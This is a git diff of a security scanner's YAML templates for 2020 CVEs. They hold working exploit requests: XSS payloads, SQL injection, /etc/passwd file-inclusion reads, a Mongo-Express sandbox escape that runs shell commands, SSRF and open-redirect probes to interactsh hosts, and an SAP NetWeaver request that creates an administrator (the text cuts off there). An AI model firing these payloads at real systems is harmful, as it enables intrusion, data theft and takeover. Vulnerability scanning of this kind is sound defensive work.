-info: - name: Palo Alto Networks Reflected XSS - author: madrobot - severity: high - description: > - A reflected cross-site scripting (XSS) vulnerability exists in the PAN-OS management web interface. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9. - - reference: https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/ - tags: cve,cve2020,vpn,xss - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.80 - cve-id: CVE-2020-2036 - cwe-id: CWE-79 -requests: - - method: GET - path: - - "{{BaseURL}}/unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - - "{{BaseURL}}/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(1)%3E" - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "" - part: body - - type: word - words: - - "text/html" - part: header diff --git a/poc/cve/cve-2020-20982-4740.yaml b/poc/cve/cve-2020-20982-4740.yaml deleted file mode 100644 index 28b76133cf..0000000000 --- a/poc/cve/cve-2020-20982-4740.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: CVE-2020-20982 - -info: - name: Shadoweb Wdja v1.5.1 xss - author: pikpikcu - severity: critical - reference: - - https://github.com/shadoweb/wdja/issues/1 - - https://nvd.nist.gov/vuln/detail/CVE-2020-20982 - tags: cve,cve2020,xss,wdja,shadoweb - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H - cvss-score: 9.60 - cve-id: CVE-2020-20982 - cwe-id: CWE-79 - description: "Cross Site Scripting (XSS) vulnerability in shadoweb wdja v1.5.1, allows attackers to execute arbitrary code and gain escalated privileges, via the backurl parameter to /php/passport/index.php." - -requests: - - method: GET - path: - - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '' - - - type: word - part: header - words: - - 'text/html' diff --git a/poc/cve/cve-2020-22211(1).yaml b/poc/cve/cve-2020-22211(1).yaml deleted file mode 100644 index a711842702..0000000000 --- a/poc/cve/cve-2020-22211(1).yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: CVE-2020-22211 -info: - name: 74cms - ajax_street.php 'key' SQL Injection - author: ritikchaddha - severity: critical - description: | - SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php. - reference: - - https://github.com/blindkey/cve_like/issues/13 - - https://nvd.nist.gov/vuln/detail/CVE-2020-22211 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-22210 - cwe-id: CWE-89 - metadata: - fofa-query: app="74cms" - shodan-query: http.html:"74cms" - tags: cve,cve2020,74cms,sqli -variables: - num: "999999999" -requests: - - method: GET - path: - - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23' - matchers: - - type: word - part: body - words: - - '{{md5({{num}})}}' - -# Enhanced by cs on 2022/06/21 diff --git a/poc/cve/cve-2020-22840.yaml b/poc/cve/cve-2020-22840.yaml new file mode 100644 index 0000000000..426073fa00 --- /dev/null +++ b/poc/cve/cve-2020-22840.yaml @@ -0,0 +1,39 @@ +id: CVE-2020-22840 + +info: + name: b2evolution CMS <6.11.6 - Open Redirect + author: geeknik + severity: medium + description: b2evolution CMS before 6.11.6 contains an open redirect vulnerability via the redirect_to parameter in email_passthrough.php. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations. + remediation: | + Upgrade b2evolution CMS to version 6.11.6 or later to mitigate the open redirect vulnerability (CVE-2020-22840). + reference: + - https://github.com/b2evolution/b2evolution/issues/102 + - http://packetstormsecurity.com/files/161362/b2evolution-CMS-6.11.6-Open-Redirection.html + - https://www.exploit-db.com/exploits/49554 + - https://nvd.nist.gov/vuln/detail/CVE-2020-22840 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-22840 + cwe-id: CWE-601 + epss-score: 0.01161 + epss-percentile: 0.83284 + cpe: cpe:2.3:a:b2evolution:b2evolution:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: b2evolution + product: b2evolution + tags: packetstorm,edb,cve,cve2020,redirect,b2evolution + +http: + - method: GET + path: + - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$' +# digest: 4a0a004730450221008097872f77e083ee9374b18077c62bf872f48da2df1712ced739421a606eaf1702203b58991ca90551263a55bf9c7a4edb0f9b2df893261d22aab66022ba6f78e500:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-24223.yaml b/poc/cve/cve-2020-24223.yaml new file mode 100644 index 0000000000..481fb03e87 --- /dev/null +++ b/poc/cve/cve-2020-24223.yaml @@ -0,0 +1,49 @@ +id: CVE-2020-24223 + +info: + name: Mara CMS 7.5 - Cross-Site Scripting + author: pikpikcu + severity: medium + description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters. + remediation: | + Upgrade to the latest version of Mara CMS or apply the vendor-provided patch to fix the XSS vulnerability. + reference: + - https://www.exploit-db.com/exploits/48777 + - https://sourceforge.net/projects/maracms/ + - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download + - https://nvd.nist.gov/vuln/detail/CVE-2020-24223 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-24223 + cwe-id: CWE-79 + epss-score: 0.00976 + epss-percentile: 0.81663 + cpe: cpe:2.3:a:mara_cms_project:mara_cms:7.5:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: mara_cms_project + product: mara_cms + tags: cve,cve2020,mara,xss,edb + +http: + - method: GET + path: + - '{{BaseURL}}/contact.php?theme=tes%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '">' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 +# digest: 4a0a00473045022043ab83b45965f275a386d5d9de52772fd7285114b4efa4a49f1576254d6d33e7022100f94f0330db512d8b17cff65578183ccf2157ac6bf6e1815cb83bc903a1a13ccd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-24391-4811.yaml b/poc/cve/cve-2020-24391-4811.yaml deleted file mode 100644 index 3ad8a6889b..0000000000 --- a/poc/cve/cve-2020-24391-4811.yaml +++ /dev/null @@ -1,53 +0,0 @@ -id: CVE-2020-24391 - -info: - name: Mongo-Express Remote Code Execution - author: leovalcante - severity: critical - description: Mongo-Express before 1.0.0 is susceptible to remote code execution because it uses safer-eval to validate user supplied javascript. Unfortunately safer-eval sandboxing capabilities are easily bypassed leading to remote code execution in the context of the node server. - reference: - - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/ - - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a - - https://nvd.nist.gov/vuln/detail/CVE-2020-24391 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-24391 - tags: cve,cve2020,mongo,express,rce,intrusive - -requests: - - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - - | - POST /checkValid HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - document=++++++++++++%28%28%29+%3D%3E+%7B%0A++++++++const+process+%3D+clearImmediate.constructor%28%22return+process%3B%22%29%28%29%3B%0A++++++++const+result+%3D+process.mainModule.require%28%22child_process%22%29.execSync%28%22id+%3E+build%2Fcss%2F{{randstr}}.css%22%29%3B%0A++++++++console.log%28%22Result%3A+%22+%2B+result%29%3B%0A++++++++return+true%3B%0A++++%7D%29%28%29++++++++ - - - | - GET /public/css/{{randstr}}.css HTTP/1.1 - Host: {{Hostname}} - - req-condition: true - cookie-reuse: true - matchers-condition: and - matchers: - - type: regex - part: body_3 - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - - - type: status - status: - - 200 - - extractors: - - type: regex - regex: - - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" - -# Enhanced by mp on 2022/03/27 diff --git a/poc/cve/cve-2020-25540.yaml b/poc/cve/cve-2020-25540.yaml deleted file mode 100644 index 3a385c2123..0000000000 --- a/poc/cve/cve-2020-25540.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2020-25540 - -info: - name: ThinkAdmin 6 - Local File Inclusion - author: geeknik - severity: high - description: ThinkAdmin version 6 is affected by a local file inclusion vulnerability because an unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. - remediation: | - Apply the latest patch or upgrade to a version that is not affected by the vulnerability. - reference: - - https://www.exploit-db.com/exploits/48812 - - https://github.com/zoujingli/ThinkAdmin/issues/244 - - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/ - - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-25540 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-25540 - cwe-id: CWE-22 - epss-score: 0.96308 - epss-percentile: 0.99406 - cpe: cpe:2.3:a:ctolog:thinkadmin:6.0:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: ctolog - product: thinkadmin - tags: thinkadmin,lfi,edb,packetstorm,cve,cve2020 - -http: - - method: GET - path: - - '{{BaseURL}}/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s' - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 -# digest: 4b0a00483046022100e4c1cfac913afdd71a9bf1a5b4b08af1badecb37eb715167ce184acf136c1d87022100c9bddf7ad90fce225a0c79221c051b790a7542df034a597eac6a373d60d01a8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-27467-4950.yaml b/poc/cve/cve-2020-27467-4950.yaml deleted file mode 100644 index 07630aa8de..0000000000 --- a/poc/cve/cve-2020-27467-4950.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: CVE-2020-27467 -info: - name: Processwire CMS <2.7.1 - Local File Inclusion - author: 0x_Akoko - severity: high - description: Processwire CMS prior to 2.7.1 is vulnerable to local file inclusion because it allows a remote attacker to retrieve sensitive files via the download parameter to index.php. - reference: - - https://github.com/Y1LD1R1M-1337/LFI-ProcessWire - - https://processwire.com/ - - https://github.com/ceng-yildirim/LFI-processwire - - https://nvd.nist.gov/vuln/detail/CVE-2020-27467 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2020-27467 - cwe-id: CWE-22 - tags: cve,cve2020,processwire,lfi,cms,oss -requests: - - method: GET - path: - - "{{BaseURL}}/index.php?download=/etc/passwd" - matchers-condition: and - matchers: - - type: regex - regex: - - "root:[x*]:0:0" - - type: status - status: - - 200 - -# Enhanced by mp on 2022/07/15 diff --git a/poc/cve/cve-2020-28976-4989.yaml b/poc/cve/cve-2020-28976-4989.yaml new file mode 100644 index 0000000000..d23e51db96 --- /dev/null +++ b/poc/cve/cve-2020-28976-4989.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-28976 + +info: + name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) + author: LogicalHunter + severity: medium + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + reference: + - https://www.exploit-db.com/exploits/49189 + - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.30 + cve-id: CVE-2020-28976 + cwe-id: CWE-918 + tags: cve,cve2020,ssrf,wordpress,wp-plugin,oast + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/get.php?subdomain={{interactsh-url}}" + - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/tree.php?subdomain={{interactsh-url}}" + + stop-at-first-match: true + matchers: + - type: word + part: interactsh_protocol + words: + - "http" \ No newline at end of file diff --git a/poc/cve/cve-2020-29227-5000.yaml b/poc/cve/cve-2020-29227-5000.yaml new file mode 100644 index 0000000000..8679600dfb --- /dev/null +++ b/poc/cve/cve-2020-29227-5000.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-29227 +info: + name: Car Rental Management System 1.0 - Local File Inclusion + author: daffainfo + severity: critical + description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution. + reference: + - https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5 + - https://nvd.nist.gov/vuln/detail/CVE-2020-29227 + - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-29227 + tags: cve,cve2020,lfi +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?page=/etc/passwd%00" + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + - type: status + status: + - 200 + +# Enhanced by mp on 2022/05/16 diff --git a/poc/cve/cve-2020-29395.yaml b/poc/cve/cve-2020-29395.yaml new file mode 100644 index 0000000000..dcaa2d6eb8 --- /dev/null +++ b/poc/cve/cve-2020-29395.yaml @@ -0,0 +1,50 @@ +id: CVE-2020-29395 + +info: + name: Wordpress EventON Calendar 3.0.5 - Cross-Site Scripting + author: daffainfo + severity: medium + description: Wordpress EventON Calendar 3.0.5 is vulnerable to cross-site scripting because it allows addons/?q= XSS via the search field. + remediation: | + Update to the latest version of the Wordpress EventON Calendar plugin (3.0.6) to mitigate this vulnerability. + reference: + - https://github.com/mustgundogdu/Research/tree/main/EventON_PLUGIN_XSS + - https://www.myeventon.com/news/ + - https://nvd.nist.gov/vuln/detail/CVE-2020-29395 + - http://packetstormsecurity.com/files/160282/WordPress-EventON-Calendar-3.0.5-Cross-Site-Scripting.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2020-29395 + cwe-id: CWE-79 + epss-score: 0.05489 + epss-percentile: 0.92391 + cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: myeventon + product: eventon + framework: wordpress + tags: cve,cve2020,wordpress,xss,wp-plugin,packetstorm + +http: + - method: GET + path: + - '{{BaseURL}}/addons/?q=%3Csvg%2Fonload%3Dalert(1)%3E' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 +# digest: 4a0a00473045022100acacef804c85b7da718c196fd8cfaa683d8571766960af825b7a7aa59d82c23a02204a51b89288bc610dfac50e7c2f07055ce5a2633e3a46ae2b52591b0f3687ed43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-3452(1).yaml b/poc/cve/cve-2020-3452(1).yaml new file mode 100644 index 0000000000..8866c4df36 --- /dev/null +++ b/poc/cve/cve-2020-3452(1).yaml @@ -0,0 +1,31 @@ +id: CVE-2020-3452 +info: + name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval + author: pdteam + severity: high + description: | + A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + reference: + - https://twitter.com/aboul3la/status/1286012324722155525 + - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html + - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html + - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html + - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html + - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2020-3452 + cwe-id: CWE-20 + tags: cve,cve2020,cisco,lfi,kev +requests: + - method: GET + path: + - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" + - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: + - type: word + words: + - "INTERNAL_PASSWORD_ENABLED" + - "CONF_VIRTUAL_KEYBOARD" + condition: and diff --git a/poc/cve/cve-2020-3452.yaml b/poc/cve/cve-2020-3452.yaml index 8866c4df36..0765bd4db4 100644 --- a/poc/cve/cve-2020-3452.yaml +++ b/poc/cve/cve-2020-3452.yaml @@ -1,10 +1,13 @@ id: CVE-2020-3452 + info: - name: Cisco Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) - Arbitrary File Retrieval + name: Cisco Adaptive Security Appliance (ASA)/Firepower Threat Defense (FTD) - Local File Inclusion author: pdteam severity: high description: | - A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software is vulnerable to local file inclusion due to directory traversal attacks that can read sensitive files on a targeted system because of a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files. + remediation: | + Apply the necessary security patches or updates provided by Cisco to fix the vulnerability. reference: - https://twitter.com/aboul3la/status/1286012324722155525 - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html @@ -12,20 +15,31 @@ info: - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86 + - https://nvd.nist.gov/vuln/detail/CVE-2020-3452 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2020-3452 - cwe-id: CWE-20 - tags: cve,cve2020,cisco,lfi,kev -requests: + cwe-id: CWE-22,CWE-20 + epss-score: 0.97529 + epss-percentile: 0.99989 + cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:* + metadata: + max-request: 2 + vendor: cisco + product: adaptive_security_appliance_software + tags: lfi,kev,packetstorm,cve,cve2020,cisco + +http: - method: GET path: - "{{BaseURL}}/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" - "{{BaseURL}}/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua" + matchers: - type: word words: - "INTERNAL_PASSWORD_ENABLED" - "CONF_VIRTUAL_KEYBOARD" condition: and +# digest: 490a0046304402200840d7f00d8ee6d97dd557be8ca1f4ad894d87c6636d5cce7156b6a391ce78ba022014ae2624ee4ba1f53d348c2de67a441f5dab0e11c92e1991556137c1520db236:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2020-35749-5075.yaml b/poc/cve/cve-2020-35749-5075.yaml new file mode 100644 index 0000000000..e2aec51746 --- /dev/null +++ b/poc/cve/cve-2020-35749-5075.yaml @@ -0,0 +1,46 @@ +id: CVE-2020-35749 + +info: + name: WordPress Simple Job Board <2.9.4 - Local File Inclusion + author: cckuailong + severity: high + description: WordPress Simple Job Board prior to version 2.9.4 is vulnerable to arbitrary file retrieval vulnerabilities because it does not validate the sjb_file parameter when viewing a resume, allowing an authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via local file inclusion. + reference: + - https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d + - https://nvd.nist.gov/vuln/detail/CVE-2020-35749 + - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing + - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N + cvss-score: 7.7 + cve-id: CVE-2020-35749 + cwe-id: CWE-22 + tags: cve,cve2020,lfi,wp,wordpress,wp-plugin,authenticated + +requests: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + + - | + GET /wp-admin/post.php?post=372&action=edit&sjb_file=../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/06/28 diff --git a/poc/cve/cve-2020-36510(1).yaml b/poc/cve/cve-2020-36510(1).yaml new file mode 100644 index 0000000000..adbb20d99d --- /dev/null +++ b/poc/cve/cve-2020-36510(1).yaml @@ -0,0 +1,35 @@ +id: CVE-2020-36510 +info: + name: 15Zine < 3.3.0 - Reflected Cross-Site Scripting + author: veshraj + severity: medium + description: | + The 15Zine Wordpress theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action, leading to a reflected cross-site scripting. + reference: + - https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36510 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.10 + cve-id: CVE-2020-36510 + cwe-id: CWE-79 + metadata: + verified: false + tags: xss,wordpress,wp-theme,wp,cve,cve2020 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-admin/admin-ajax.php?action=cb_s_a&cbi=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/poc/cve/cve-2020-6287.yaml b/poc/cve/cve-2020-6287.yaml deleted file mode 100644 index ff444b8861..0000000000 --- a/poc/cve/cve-2020-6287.yaml +++ /dev/null @@ -1,64 +0,0 @@ -id: CVE-2020-6287 - -info: - name: SAP NetWeaver AS JAVA 7.30-7.50 - Remote Admin Addition - author: dwisiswant0 - severity: critical - description: SAP NetWeaver AS JAVA (LM Configuration Wizard), versions 7.30, 7.31, 7.40, 7.50, does not perform an authentication check which allows an attacker without prior authentication to execute configuration tasks to perform critical actions against the SAP Java system, including the ability to create an administrative user, and therefore compromising Confidentiality, Integrity and Availability of the system. - remediation: | - Apply the relevant SAP Security Note or patch provided by the vendor to mitigate this vulnerability. - reference: - - https://launchpad.support.sap.com/#/notes/2934135 - - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=552599675 - - https://www.onapsis.com/recon-sap-cyber-security-vulnerability - - https://github.com/chipik/SAP_RECON - - https://nvd.nist.gov/vuln/detail/CVE-2020-6287 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10 - cve-id: CVE-2020-6287 - cwe-id: CWE-306 - epss-score: 0.97274 - epss-percentile: 0.99822 - cpe: cpe:2.3:a:sap:netweaver_application_server_java:7.30:*:*:*:*:*:*:* - metadata: - max-request: 1 - vendor: sap - product: netweaver_application_server_java - shodan-query: http.favicon.hash:-266008933 - tags: cve,cve2020,sap,kev - -http: - - raw: - - | - POST /CTCWebService/CTCWebServiceBean/ConfigServlet HTTP/1.1 - Host: {{Hostname}} - Content-Type: text/xml; charset=UTF-8 - Connection: close - - sap.com/tc~lm~config~contentcontent/Netweaver/ASJava/NWA/SPC/SPC_UserManagement.cproc - CiAgICAgICAgICAgIDxQQ0s+CiAgICAgICAgICAgIDxVc2VybWFuYWdlbWVudD4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT05GSUc+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+QWRtaW5pc3RyYXRvcjwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0NPTkZJRz4KICAgICAgICAgICAgICA8U0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgICAgPHJvbGVOYW1lPlRoaXNJc1JuZDczODA8L3JvbGVOYW1lPgogICAgICAgICAgICAgIDwvU0FQX1hJX1BDS19DT01NVU5JQ0FUSU9OPgogICAgICAgICAgICAgIDxTQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX01PTklUT1I+CiAgICAgICAgICAgICAgPFNBUF9YSV9QQ0tfQURNSU4+CiAgICAgICAgICAgICAgICA8cm9sZU5hbWU+VGhpc0lzUm5kNzM4MDwvcm9sZU5hbWU+CiAgICAgICAgICAgICAgPC9TQVBfWElfUENLX0FETUlOPgogICAgICAgICAgICAgIDxQQ0tVc2VyPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lIHNlY3VyZT0idHJ1ZSI+c2FwUnBvYzYzNTE8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+U2VjdXJlIVB3RDg4OTA8L3Bhc3N3b3JkPgogICAgICAgICAgICAgIDwvUENLVXNlcj4KICAgICAgICAgICAgICA8UENLUmVjZWl2ZXI+CiAgICAgICAgICAgICAgICA8dXNlck5hbWU+VGhpc0lzUm5kNzM4MDwvdXNlck5hbWU+CiAgICAgICAgICAgICAgICA8cGFzc3dvcmQgc2VjdXJlPSJ0cnVlIj5UaGlzSXNSbmQ3MzgwPC9wYXNzd29yZD4KICAgICAgICAgICAgICA8L1BDS1JlY2VpdmVyPgogICAgICAgICAgICAgIDxQQ0tNb25pdG9yPgogICAgICAgICAgICAgICAgPHVzZXJOYW1lPlRoaXNJc1JuZDczODA8L3VzZXJOYW1lPgogICAgICAgICAgICAgICAgPHBhc3N3b3JkIHNlY3VyZT0idHJ1ZSI+VGhpc0